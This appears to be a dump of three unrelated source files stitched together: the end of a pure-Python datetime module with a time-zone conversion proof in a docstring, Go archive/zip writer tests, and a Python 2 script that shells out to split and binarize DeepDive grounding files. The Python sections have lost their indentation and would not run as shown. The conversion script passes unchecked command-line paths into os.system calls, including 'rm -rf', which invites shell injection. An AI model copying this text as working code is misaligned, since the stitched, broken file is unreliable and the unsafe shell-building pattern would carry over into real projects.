seconds = self.hour * 3600 + (self.minute - tzoff) * 60 + self.second
self._hashcode = hash(timedelta(days, seconds, self.microsecond))
return self._hashcode
# Pickle support.
def _getstate(self):
# Pickle payload: 10 bytes (2-byte year, month, day, hour, minute,
# second, 3-byte microsecond), plus the tzinfo object when aware.
yhi, ylo = divmod(self._year, 256)
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = _struct.pack('10B', yhi, ylo, self._month, self._day,
self._hour, self._minute, self._second,
us1, us2, us3)
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
# Inverse of _getstate: unpack the 10-byte string and reattach tzinfo.
if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
raise TypeError("bad tzinfo state arg")
(yhi, ylo, self._month, self._day, self._hour,
self._minute, self._second, us1, us2, us3) = (ord(string[0]),
ord(string[1]), ord(string[2]), ord(string[3]),
ord(string[4]), ord(string[5]), ord(string[6]),
ord(string[7]), ord(string[8]), ord(string[9]))
self._year = yhi * 256 + ylo
self._microsecond = (((us1 << 8) | us2) << 8) | us3
self._tzinfo = tzinfo
def __reduce__(self):
return (self.__class__, self._getstate())
# Extreme representable values and smallest difference, attached after
# the class body exists.
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
    """Return the ordinal of the Monday starting ISO week 1 of `year`.

    ISO week 1 is the Monday-to-Sunday week containing the year's first
    Thursday, so Jan 1 falling on Fri/Sat/Sun pushes week 1 forward.
    """
    THURSDAY = 3
    jan1 = _ymd2ord(year, 1, 1)
    jan1_weekday = (jan1 + 6) % 7  # Monday == 0 (see weekday() above)
    monday = jan1 - jan1_weekday
    if jan1_weekday > THURSDAY:
        monday += 7
    return monday
"""
Some time zone algebra. For a datetime x, let
x.n = x stripped of its timezone -- its naive time.
x.o = x.utcoffset(), and assuming that doesn't raise an exception or
return None
x.d = x.dst(), and assuming that doesn't raise an exception or
return None
x.s = x's standard offset, x.o - x.d
Now some derived rules, where k is a duration (timedelta).
1. x.o = x.s + x.d
This follows from the definition of x.s.
2. If x and y have the same tzinfo member, x.s = y.s.
This is actually a requirement, an assumption we need to make about
sane tzinfo classes.
3. The naive UTC time corresponding to x is x.n - x.o.
This is again a requirement for a sane tzinfo class.
4. (x+k).s = x.s
This follows from #2, and from the fact that datetime+timedelta preserves tzinfo.
5. (x+k).n = x.n + k
Again follows from how arithmetic is defined.
Now we can explain tz.fromutc(x). Let's assume it's an interesting case
(meaning that the various tzinfo methods exist, and don't blow up or return
None when called).
The function wants to return a datetime y with timezone tz, equivalent to x.
x is already in UTC.
By #3, we want
y.n - y.o = x.n [1]
The algorithm starts by attaching tz to x.n, and calling that y. So
x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
becomes true; in effect, we want to solve [2] for k:
(y+k).n - (y+k).o = x.n [2]
By #1, this is the same as
(y+k).n - ((y+k).s + (y+k).d) = x.n [3]
By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
Substituting that into [3],
x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
k - (y+k).s - (y+k).d = 0; rearranging,
k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
k = y.s - (y+k).d
On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
approximate k by ignoring the (y+k).d term at first. Note that k can't be
very large, since all offset-returning methods return a duration of magnitude
less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
be 0, so ignoring it has no consequence then.
In any case, the new value is
z = y + y.s [4]
It's helpful to step back and look at [4] from a higher level: it's simply
mapping from UTC to tz's standard time.
At this point, if
z.n - z.o = x.n [5]
we have an equivalent time, and are almost done. The insecurity here is
at the start of daylight time. Picture US Eastern for concreteness. The wall
time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
sense then. The docs ask that an Eastern tzinfo class consider such a time to
be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
on the day DST starts. We want to return the 1:MM EST spelling because that's
the only spelling that makes sense on the local wall clock.
In fact, if [5] holds at this point, we do have the standard-time spelling,
but that takes a bit of proof. We first prove a stronger result. What's the
difference between the LHS and RHS of [5]? Let
diff = x.n - (z.n - z.o) [6]
Now
z.n = by [4]
(y + y.s).n = by #5
y.n + y.s = since y.n = x.n
x.n + y.s = since z and y have the same tzinfo member,
y.s = z.s by #2
x.n + z.s
Plugging that back into [6] gives
diff =
x.n - ((x.n + z.s) - z.o) = expanding
x.n - x.n - z.s + z.o = cancelling
- z.s + z.o = by #2
z.d
So diff = z.d.
If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
spelling we wanted in the endcase described above. We're done. Contrarily,
if z.d = 0, then we have a UTC equivalent, and are also done.
If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
add to z (in effect, z is in tz's standard time, and we need to shift the
local clock into tz's daylight time).
Let
z' = z + z.d = z + diff [7]
and we can again ask whether
z'.n - z'.o = x.n [8]
If so, we're done. If not, the tzinfo class is insane, according to the
assumptions we've made. This also requires a bit of proof. As before, let's
compute the difference between the LHS and RHS of [8] (and skipping some of
the justifications for the kinds of substitutions we've done several times
already):
diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
x.n - (z.n + diff - z'.o) = replacing diff via [6]
x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
- z.n + z.n - z.o + z'.o = cancel z.n
- z.o + z'.o = #1 twice
-z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
z'.d - z.d
So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
we've found the UTC-equivalent so are done. In fact, we stop with [7] and
return z', not bothering to compute z'.d.
How could z.d and z'.d differ? z' = z + z.d [7], so merely moving z' by
a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
would have to change the result dst() returns: we start in DST, and moving
a little further into it takes us out of DST.
There isn't a sane case where this can happen. The closest it gets is at
the end of DST, where there's an hour in UTC with no spelling in a hybrid
tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
UTC) because the docs insist on that, but 0:MM is taken as being in daylight
time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
standard time. Since that's what the local clock *does*, we want to map both
UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
in local time, but so it goes -- it's the way the local clock works.
When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
(correctly) concludes that z' is not UTC-equivalent to x.
Because we know z.d said z was in daylight time (else [5] would have held and
we would have stopped then), and we know z.d != z'.d (else [8] would have held
and we have stopped then), and there are only 2 possible values dst() can
return in Eastern, it follows that z'.d must be 0 (which it is in the example,
but the reasoning doesn't depend on the example -- it depends on there being
two possible dst() outcomes, one zero and the other non-zero). Therefore
z' must be in standard time, and is the spelling we want in this case.
Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
concerned (because it takes z' as being in standard time rather than the
daylight time we intend here), but returning it gives the real-life "local
clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
tz.
When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
the 1:MM standard time spelling we want.
So how can this break? One of the assumptions must be violated. Two
possibilities:
1) [2] effectively says that y.s is invariant across all y belong to a given
time zone. This isn't true if, for political reasons or continental drift,
a region decides to change its base offset from UTC.
2) There may be versions of "double daylight" time where the tail end of
the analysis gives up a step too early. I haven't thought about that
enough to say.
In any case, it's clear that the default fromutc() is strong enough to handle
"almost all" time zones: so long as the standard offset is invariant, it
doesn't matter if daylight time transition points change from year to year, or
if daylight time is skipped in some years; it doesn't matter how large or
small dst() may get within its bounds; and it doesn't even matter if some
perverse time zone returns a negative dst(). So a breaking case must be
pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
""" | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package zip
import (
"bytes"
"compress/flate"
"encoding/binary"
"fmt"
"hash/crc32"
"io"
"io/fs"
"math/rand"
"os"
"strings"
"testing"
"testing/fstest"
"time"
)
// TODO(adg): a more sophisticated test suite
type WriteTest struct {
Name string
Data []byte
Method uint16
Mode fs.FileMode
}
var writeTests = []WriteTest{
{
Name: "foo",
Data: []byte("Rabbits, guinea pigs, gophers, marsupial rats, and quolls."),
Method: Store,
Mode: 0666,
},
{
Name: "bar",
Data: nil, // large data set in the test
Method: Deflate,
Mode: 0644,
},
{
Name: "setuid",
Data: []byte("setuid file"),
Method: Deflate,
Mode: 0755 | fs.ModeSetuid,
},
{
Name: "setgid",
Data: []byte("setgid file"),
Method: Deflate,
Mode: 0755 | fs.ModeSetgid,
},
{
Name: "symlink",
Data: []byte("../link/target"),
Method: Deflate,
Mode: 0755 | fs.ModeSymlink,
},
{
Name: "device",
Data: []byte("device file"),
Method: Deflate,
Mode: 0755 | fs.ModeDevice,
},
{
Name: "chardevice",
Data: []byte("char device file"),
Method: Deflate,
Mode: 0755 | fs.ModeDevice | fs.ModeCharDevice,
},
}
// TestWriter round-trips writeTests through a Writer and a Reader, verifying
// that names, modes, and contents survive the write/read cycle.
func TestWriter(t *testing.T) {
	// Fill the large Deflate entry with random data for the duration of
	// this test only; the deferred reset keeps writeTests reusable.
	largeData := make([]byte, 1<<17)
	if _, err := rand.Read(largeData); err != nil {
		t.Fatal("rand.Read failed:", err)
	}
	writeTests[1].Data = largeData
	defer func() {
		writeTests[1].Data = nil
	}()

	// write a zip file
	buf := new(bytes.Buffer)
	w := NewWriter(buf)

	for _, wt := range writeTests {
		testCreate(t, w, &wt)
	}

	if err := w.Close(); err != nil {
		t.Fatal(err)
	}

	// read it back
	r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, wt := range writeTests {
		testReadFile(t, r.File[i], &wt)
	}
}
// TestWriterComment is a test for EOCD (end of central directory) comment
// read/write: comments up to uint16max bytes round-trip; longer ones are
// rejected by SetComment.
func TestWriterComment(t *testing.T) {
	tests := []struct {
		comment string
		ok      bool
	}{
		{"hi, hello", true},
		{"hi, こんにちわ", true},
		{strings.Repeat("a", uint16max), true},
		{strings.Repeat("a", uint16max+1), false},
	}

	for _, test := range tests {
		// write a zip file
		buf := new(bytes.Buffer)
		w := NewWriter(buf)
		if err := w.SetComment(test.comment); err != nil {
			if test.ok {
				t.Fatalf("SetComment: unexpected error %v", err)
			}
			continue
		} else {
			if !test.ok {
				t.Fatalf("SetComment: unexpected success, want error")
			}
		}

		// Close must succeed exactly when the comment was accepted.
		if err := w.Close(); test.ok == (err != nil) {
			t.Fatal(err)
		}

		if w.closed != test.ok {
			t.Fatalf("Writer.closed: got %v, want %v", w.closed, test.ok)
		}

		// skip read test in failure cases
		if !test.ok {
			continue
		}

		// read it back
		r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
		if err != nil {
			t.Fatal(err)
		}
		if r.Comment != test.comment {
			t.Fatalf("Reader.Comment: got %v, want %v", r.Comment, test.comment)
		}
	}
}
// TestWriterUTF8 verifies that the UTF-8 flag (0x800) is set on a file header
// exactly when name/comment require it and NonUTF8 is not forced; 0x8 is the
// data-descriptor flag that Deflate entries always carry.
func TestWriterUTF8(t *testing.T) {
	utf8Tests := []struct {
		name    string
		comment string
		nonUTF8 bool
		flags   uint16
	}{
		{
			name:    "hi, hello",
			comment: "in the world",
			flags:   0x8,
		},
		{
			name:    "hi, こんにちわ",
			comment: "in the world",
			flags:   0x808,
		},
		{
			name:    "hi, こんにちわ",
			comment: "in the world",
			nonUTF8: true,
			flags:   0x8,
		},
		{
			name:    "hi, hello",
			comment: "in the 世界",
			flags:   0x808,
		},
		{
			name:    "hi, こんにちわ",
			comment: "in the 世界",
			flags:   0x808,
		},
		{
			name:    "the replacement rune is �",
			comment: "the replacement rune is �",
			flags:   0x808,
		},
		{
			// Name is Japanese encoded in Shift JIS.
			name:    "\x93\xfa\x96{\x8c\xea.txt",
			comment: "in the 世界",
			flags:   0x008, // UTF-8 must not be set
		},
	}

	// write a zip file
	buf := new(bytes.Buffer)
	w := NewWriter(buf)
	for _, test := range utf8Tests {
		h := &FileHeader{
			Name:    test.name,
			Comment: test.comment,
			NonUTF8: test.nonUTF8,
			Method:  Deflate,
		}
		w, err := w.CreateHeader(h)
		if err != nil {
			t.Fatal(err)
		}
		w.Write([]byte{})
	}
	if err := w.Close(); err != nil {
		t.Fatal(err)
	}

	// read it back and compare the flags actually written
	r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, test := range utf8Tests {
		flags := r.File[i].Flags
		if flags != test.flags {
			t.Errorf("CreateHeader(name=%q comment=%q nonUTF8=%v): flags=%#x, want %#x", test.name, test.comment, test.nonUTF8, flags, test.flags)
		}
	}
}
// TestWriterTime writes a single entry with a fixed Modified timestamp and
// compares the produced archive byte-for-byte against the golden file
// testdata/time-go.zip.
func TestWriterTime(t *testing.T) {
	var buf bytes.Buffer
	h := &FileHeader{
		Name:     "test.txt",
		Modified: time.Date(2017, 10, 31, 21, 11, 57, 0, timeZone(-7*time.Hour)),
	}
	w := NewWriter(&buf)
	if _, err := w.CreateHeader(h); err != nil {
		t.Fatalf("unexpected CreateHeader error: %v", err)
	}
	if err := w.Close(); err != nil {
		t.Fatalf("unexpected Close error: %v", err)
	}

	want, err := os.ReadFile("testdata/time-go.zip")
	if err != nil {
		t.Fatalf("unexpected ReadFile error: %v", err)
	}
	if got := buf.Bytes(); !bytes.Equal(got, want) {
		// Dump both archives in hex to ease diffing on failure.
		fmt.Printf("%x\n%x\n", got, want)
		t.Error("contents of time-go.zip differ")
	}
}
// TestWriterOffset is like TestWriter but prepends unrelated bytes to the
// output and calls SetOffset, checking that archives appended to existing
// data remain readable.
func TestWriterOffset(t *testing.T) {
	largeData := make([]byte, 1<<17)
	if _, err := rand.Read(largeData); err != nil {
		t.Fatal("rand.Read failed:", err)
	}
	writeTests[1].Data = largeData
	defer func() {
		writeTests[1].Data = nil
	}()

	// write a zip file after some pre-existing bytes
	buf := new(bytes.Buffer)
	existingData := []byte{1, 2, 3, 1, 2, 3, 1, 2, 3}
	n, _ := buf.Write(existingData)
	w := NewWriter(buf)
	w.SetOffset(int64(n))

	for _, wt := range writeTests {
		testCreate(t, w, &wt)
	}

	if err := w.Close(); err != nil {
		t.Fatal(err)
	}

	// read it back
	r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, wt := range writeTests {
		testReadFile(t, r.File[i], &wt)
	}
}
// TestWriterFlush checks that output is buffered until Flush is called:
// nothing reaches the underlying writer after Create, and something does
// after Flush. The buffer is wrapped in a bare io.Writer so only the Write
// method is visible to the zip Writer.
func TestWriterFlush(t *testing.T) {
	var buf bytes.Buffer
	w := NewWriter(struct{ io.Writer }{&buf})
	_, err := w.Create("foo")
	if err != nil {
		t.Fatal(err)
	}
	if buf.Len() > 0 {
		t.Fatalf("Unexpected %d bytes already in buffer", buf.Len())
	}
	if err := w.Flush(); err != nil {
		t.Fatal(err)
	}
	if buf.Len() == 0 {
		t.Fatal("No bytes written after Flush")
	}
}
// TestWriterDir verifies that a directory entry (name ending in "/") accepts
// only empty writes: writing zero bytes succeeds, writing content fails.
func TestWriterDir(t *testing.T) {
	zw := NewWriter(io.Discard)
	entry, err := zw.Create("dir/")
	if err != nil {
		t.Fatal(err)
	}

	if _, err = entry.Write(nil); err != nil {
		t.Errorf("Write(nil) to directory: got %v, want nil", err)
	}
	if _, err = entry.Write([]byte("hello")); err == nil {
		t.Error(`Write("hello") to directory: got nil error, want non-nil`)
	}
}
// TestWriterDirAttributes checks that a directory entry is written with
// zeroed method, flags, CRC and sizes — regardless of what the caller put in
// the FileHeader — and that no data descriptor follows it. The checks are
// done at raw byte offsets within the local file header.
func TestWriterDirAttributes(t *testing.T) {
	var buf bytes.Buffer
	w := NewWriter(&buf)
	if _, err := w.CreateHeader(&FileHeader{
		Name:               "dir/",
		Method:             Deflate,
		CompressedSize64:   1234,
		UncompressedSize64: 5678,
	}); err != nil {
		t.Fatal(err)
	}
	if err := w.Close(); err != nil {
		t.Fatal(err)
	}
	b := buf.Bytes()

	// Locate the local file header by its signature.
	var sig [4]byte
	binary.LittleEndian.PutUint32(sig[:], uint32(fileHeaderSignature))

	idx := bytes.Index(b, sig[:])
	if idx == -1 {
		t.Fatal("file header not found")
	}
	b = b[idx:]

	if !bytes.Equal(b[6:10], []byte{0, 0, 0, 0}) { // FileHeader.Flags: 0, FileHeader.Method: 0
		t.Errorf("unexpected method and flags: %v", b[6:10])
	}

	if !bytes.Equal(b[14:26], make([]byte, 12)) { // FileHeader.{CRC32,CompressSize,UncompressedSize} all zero.
		t.Errorf("unexpected crc, compress and uncompressed size to be 0 was: %v", b[14:26])
	}

	binary.LittleEndian.PutUint32(sig[:], uint32(dataDescriptorSignature))
	if bytes.Contains(b, sig[:]) {
		t.Error("there should be no data descriptor")
	}
}
// TestWriterCopy builds an archive, then uses Writer.Copy to clone each entry
// into a second archive without recompressing, and verifies the copy reads
// back identically.
func TestWriterCopy(t *testing.T) {
	// make a zip file
	buf := new(bytes.Buffer)
	w := NewWriter(buf)
	for _, wt := range writeTests {
		testCreate(t, w, &wt)
	}
	if err := w.Close(); err != nil {
		t.Fatal(err)
	}

	// read it back
	src, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, wt := range writeTests {
		testReadFile(t, src.File[i], &wt)
	}

	// make a new zip file copying the old compressed data.
	buf2 := new(bytes.Buffer)
	dst := NewWriter(buf2)
	for _, f := range src.File {
		if err := dst.Copy(f); err != nil {
			t.Fatal(err)
		}
	}
	if err := dst.Close(); err != nil {
		t.Fatal(err)
	}

	// read the new one back
	r, err := NewReader(bytes.NewReader(buf2.Bytes()), int64(buf2.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, wt := range writeTests {
		testReadFile(t, r.File[i], &wt)
	}
}
// TestWriterCreateRaw exercises Writer.CreateRaw: the caller supplies
// already-compressed bytes plus CRC/size metadata, and the Writer must store
// them verbatim. The entries are then read back and decompressed to confirm
// the metadata and payload are consistent.
func TestWriterCreateRaw(t *testing.T) {
	files := []struct {
		name             string
		content          []byte
		method           uint16
		flags            uint16
		crc32            uint32
		uncompressedSize uint64
		compressedSize   uint64
	}{
		{
			name:    "small store w desc",
			content: []byte("gophers"),
			method:  Store,
			flags:   0x8,
		},
		{
			name:    "small deflate wo desc",
			content: bytes.Repeat([]byte("abcdefg"), 2048),
			method:  Deflate,
		},
	}

	// write a zip file
	archive := new(bytes.Buffer)
	w := NewWriter(archive)

	for i := range files {
		f := &files[i]
		// Compute the metadata CreateRaw requires up front.
		f.crc32 = crc32.ChecksumIEEE(f.content)
		size := uint64(len(f.content))
		f.uncompressedSize = size
		f.compressedSize = size

		var compressedContent []byte
		if f.method == Deflate {
			// Pre-compress the payload ourselves; CreateRaw will not.
			var buf bytes.Buffer
			w, err := flate.NewWriter(&buf, flate.BestSpeed)
			if err != nil {
				t.Fatalf("flate.NewWriter err = %v", err)
			}
			_, err = w.Write(f.content)
			if err != nil {
				t.Fatalf("flate Write err = %v", err)
			}
			err = w.Close()
			if err != nil {
				t.Fatalf("flate Writer.Close err = %v", err)
			}
			compressedContent = buf.Bytes()
			f.compressedSize = uint64(len(compressedContent))
		}

		h := &FileHeader{
			Name:               f.name,
			Method:             f.method,
			Flags:              f.flags,
			CRC32:              f.crc32,
			CompressedSize64:   f.compressedSize,
			UncompressedSize64: f.uncompressedSize,
		}
		w, err := w.CreateRaw(h)
		if err != nil {
			t.Fatal(err)
		}
		if compressedContent != nil {
			_, err = w.Write(compressedContent)
		} else {
			_, err = w.Write(f.content)
		}
		if err != nil {
			t.Fatalf("%s Write got %v; want nil", f.name, err)
		}
	}

	if err := w.Close(); err != nil {
		t.Fatal(err)
	}

	// read it back
	r, err := NewReader(bytes.NewReader(archive.Bytes()), int64(archive.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, want := range files {
		got := r.File[i]
		if got.Name != want.name {
			t.Errorf("got Name %s; want %s", got.Name, want.name)
		}
		if got.Method != want.method {
			t.Errorf("%s: got Method %#x; want %#x", want.name, got.Method, want.method)
		}
		if got.Flags != want.flags {
			t.Errorf("%s: got Flags %#x; want %#x", want.name, got.Flags, want.flags)
		}
		if got.CRC32 != want.crc32 {
			t.Errorf("%s: got CRC32 %#x; want %#x", want.name, got.CRC32, want.crc32)
		}
		if got.CompressedSize64 != want.compressedSize {
			t.Errorf("%s: got CompressedSize64 %d; want %d", want.name, got.CompressedSize64, want.compressedSize)
		}
		if got.UncompressedSize64 != want.uncompressedSize {
			t.Errorf("%s: got UncompressedSize64 %d; want %d", want.name, got.UncompressedSize64, want.uncompressedSize)
		}

		// Decompress and compare the payload.
		r, err := got.Open()
		if err != nil {
			t.Errorf("%s: Open err = %v", got.Name, err)
			continue
		}

		buf, err := io.ReadAll(r)
		if err != nil {
			t.Errorf("%s: ReadAll err = %v", got.Name, err)
			continue
		}

		if !bytes.Equal(buf, want.content) {
			t.Errorf("%v: ReadAll returned unexpected bytes", got.Name)
		}
	}
}
// testCreate appends one entry described by wt to the archive being built
// by w, failing the test on any error.
func testCreate(t *testing.T, w *Writer, wt *WriteTest) {
	hdr := &FileHeader{
		Name:   wt.Name,
		Method: wt.Method,
	}
	if wt.Mode != 0 {
		hdr.SetMode(wt.Mode)
	}

	entry, err := w.CreateHeader(hdr)
	if err != nil {
		t.Fatal(err)
	}
	if _, err = entry.Write(wt.Data); err != nil {
		t.Fatal(err)
	}
}
// testReadFile checks that f, read back from an archive, matches wt in
// name, mode, and contents.
func testReadFile(t *testing.T, f *File, wt *WriteTest) {
	if f.Name != wt.Name {
		t.Fatalf("File name: got %q, want %q", f.Name, wt.Name)
	}
	testFileMode(t, f, wt.Mode)

	rc, err := f.Open()
	if err != nil {
		t.Fatalf("opening %s: %v", f.Name, err)
	}
	contents, err := io.ReadAll(rc)
	if err != nil {
		t.Fatalf("reading %s: %v", f.Name, err)
	}
	if err = rc.Close(); err != nil {
		t.Fatalf("closing %s: %v", f.Name, err)
	}

	if !bytes.Equal(contents, wt.Data) {
		t.Errorf("File contents %q, want %q", contents, wt.Data)
	}
}
// BenchmarkCompressedZipGarbage measures allocation behavior when deflating
// three 1 MiB entries into an in-memory archive, run in parallel with one
// reused buffer per goroutine.
func BenchmarkCompressedZipGarbage(b *testing.B) {
	bigBuf := bytes.Repeat([]byte("a"), 1<<20)

	// runOnce writes one complete three-entry archive into buf.
	runOnce := func(buf *bytes.Buffer) {
		buf.Reset()
		zw := NewWriter(buf)
		for j := 0; j < 3; j++ {
			w, _ := zw.CreateHeader(&FileHeader{
				Name:   "foo",
				Method: Deflate,
			})
			w.Write(bigBuf)
		}
		zw.Close()
	}

	b.ReportAllocs()
	// Run once and then reset the timer.
	// This effectively discards the very large initial flate setup cost,
	// as well as the initialization of bigBuf.
	runOnce(&bytes.Buffer{})
	b.ResetTimer()

	b.RunParallel(func(pb *testing.PB) {
		var buf bytes.Buffer
		for pb.Next() {
			runOnce(&buf)
		}
	})
}
// writeTestsToFS builds an in-memory fs.FS with one MapFile per test entry,
// keyed by name and carrying that entry's data and mode.
func writeTestsToFS(tests []WriteTest) fs.FS {
	m := make(fstest.MapFS, len(tests))
	for _, wt := range tests {
		m[wt.Name] = &fstest.MapFile{
			Data: wt.Data,
			Mode: wt.Mode,
		}
	}
	return m
}
// TestWriterAddFS checks Writer.AddFS: every file and directory of the FS is
// added, including directories that exist only implicitly (a parent of a
// listed file but not itself listed).
func TestWriterAddFS(t *testing.T) {
	buf := new(bytes.Buffer)
	w := NewWriter(buf)
	tests := []WriteTest{
		{Name: "emptyfolder", Mode: 0o755 | os.ModeDir},
		{Name: "file.go", Data: []byte("hello"), Mode: 0644},
		{Name: "subfolder/another.go", Data: []byte("world"), Mode: 0644},
		// Notably missing here is the "subfolder" directory. This makes sure even
		// if we don't have a subfolder directory listed.
	}
	err := w.AddFS(writeTestsToFS(tests))
	if err != nil {
		t.Fatal(err)
	}

	if err := w.Close(); err != nil {
		t.Fatal(err)
	}

	// Add subfolder into fsys to match what we'll read from the zip.
	// The full-slice expression (tests[:2:2]) forces append to copy, so the
	// original backing array is not overwritten.
	tests = append(tests[:2:2], WriteTest{Name: "subfolder", Mode: 0o555 | os.ModeDir}, tests[2])

	// read it back
	r, err := NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	if err != nil {
		t.Fatal(err)
	}
	for i, wt := range tests {
		if wt.Mode.IsDir() {
			wt.Name += "/"
		}
		testReadFile(t, r.File[i], &wt)
	}
}
// TestIssue61875 checks that AddFS rejects a file system containing
// non-regular files (symlinks, devices) instead of silently archiving them.
// See go.dev/issue/61875.
func TestIssue61875(t *testing.T) {
	buf := new(bytes.Buffer)
	w := NewWriter(buf)
	tests := []WriteTest{
		{
			Name:   "symlink",
			Data:   []byte("../link/target"),
			Method: Deflate,
			Mode:   0755 | fs.ModeSymlink,
		},
		{
			Name:   "device",
			Data:   []byte(""),
			Method: Deflate,
			Mode:   0755 | fs.ModeDevice,
		},
	}
	err := w.AddFS(writeTestsToFS(tests))
	if err == nil {
		t.Errorf("expected error, got nil")
	}
}
#! /usr/bin/env python
# Script to convert grounding files in TSV format to binary format for dimmwitted sampler
# Usage: python tobinary.py [input folder] transform_script [output folder]
# It split the specific files in the input folder and for each of them calls the C++ binary to convert the format
import sys
import re
import os
# set up parameters
CHUNKSIZE = '10000000'
INPUTFOLDER = sys.argv[1]
transform_script = sys.argv[2]
OUTPUTFOLDER = sys.argv[3]
# clean up folder
os.system('rm -rf ' + INPUTFOLDER + "/dd_tmp")
os.system('mkdir -p ' + INPUTFOLDER + "/dd_tmp")
os.system('rm -rf ' + INPUTFOLDER + "/nedges_")
if not os.path.isfile(INPUTFOLDER + "/dd_factormeta"):
os.system("touch %s/dd_factormeta" %INPUTFOLDER)
# handle factors
for l in open(INPUTFOLDER + "/dd_factormeta"):
(factor_name, function_id, positives) = l.split('\t')
positives = positives.strip().replace('true', '1').replace('false', '0').split(' ')
nvars = '%d' % len(positives)
print "SPLITTING", factor_name, "..."
os.system('split -a 4 -l ' + CHUNKSIZE + ' ' + INPUTFOLDER + '/dd_factors_' + factor_name + '_out ' + INPUTFOLDER + '/dd_tmp/dd_factors_' + factor_name + '_out')
print "BINARIZE ", factor_name, "..."
os.system('ls ' + INPUTFOLDER + '/dd_tmp | egrep "^dd_factors_' + factor_name + '_out" | xargs -P 40 -I {} -n 1 sh -c \'' + transform_script + ' factor ' + INPUTFOLDER + '/dd_tmp/{} ' + function_id + ' ' + nvars + ' ' + (' '.join(positives)) + ' \' | awk \'{s+=$1} END {printf \"%.0f\\n\", s}\' >>' + INPUTFOLDER + "/dd_nedges_")
# handle variables
for f in os.listdir(INPUTFOLDER):
if f.startswith('dd_variables_'):
print "SPLITTING", f, "..."
os.system("touch %s/dd_tmp/%s" %(INPUTFOLDER, f))
os.system('split -a 4 -l ' + CHUNKSIZE + ' ' + INPUTFOLDER + '/' + f + ' ' + INPUTFOLDER + '/dd_tmp/' + f)
print "BINARIZE ", f, "..."
os.system('ls ' + INPUTFOLDER + '/dd_tmp | egrep "^' + f + '" | xargs -P 40 -I {} -n 1 sh -c \'' + transform_script + ' variable ' + INPUTFOLDER + '/dd_tmp/{} \'')
# handle weights
print "BINARIZE ", 'weights', "..."
os.system(transform_script + ' weight ' + INPUTFOLDER + '/dd_weights')
# move files
os.system('rm -rf ' + INPUTFOLDER + "/dd_factors")
os.system('mkdir -p ' + INPUTFOLDER + "/dd_factors")
os.system('mv ' + INPUTFOLDER + '/dd_tmp/dd_factors*.bin ' + INPUTFOLDER + '/dd_factors')
os.system('rm -rf ' + INPUTFOLDER + "/dd_variables")
os.system('mkdir -p ' + INPUTFOLDER + "/dd_variables")
os.system('mv ' + INPUTFOLDER + '/dd_tmp/dd_variables*.bin ' + INPUTFOLDER + '/dd_variables')
nfactor_files = 0
nvariable_files = 0
# counting
print "COUNTING", "variables", "..."
os.system('wc -l ' + INPUTFOLDER + "/dd_tmp/dd_variables_* | tail -n 1 | sed -e 's/^[ \t]*//g' | cut -d ' ' -f 1 > " + INPUTFOLDER + '/dd_nvariables_wc')
os.system('export dd_nvar=`cat ' + INPUTFOLDER + '/dd_nvariables_wc`; echo $dd_nvar + %d | bc > ' % nvariable_files + INPUTFOLDER + '/dd_nvariables; unset dd_nvar')
print "COUNTING", "factors", "..."
os.system('wc -l ' + INPUTFOLDER + "/dd_tmp/dd_factors_* | tail -n 1 | sed -e 's/^[ \t]*//g' | cut -d ' ' -f 1 > " + INPUTFOLDER + '/dd_nfactors_wc')
os.system('export dd_nfact=`cat ' + INPUTFOLDER + '/dd_nfactors_wc`; echo $dd_nfact + %d | bc > ' % nfactor_files + INPUTFOLDER + '/dd_nfactors; unset dd_nfact')
print "COUNTING", "weights", "..."
os.system('wc -l ' + INPUTFOLDER + "/dd_weights | tail -n 1 | sed -e 's/^[ \t]*//g' | cut -d ' ' -f 1 > " + INPUTFOLDER + '/dd_nweights')
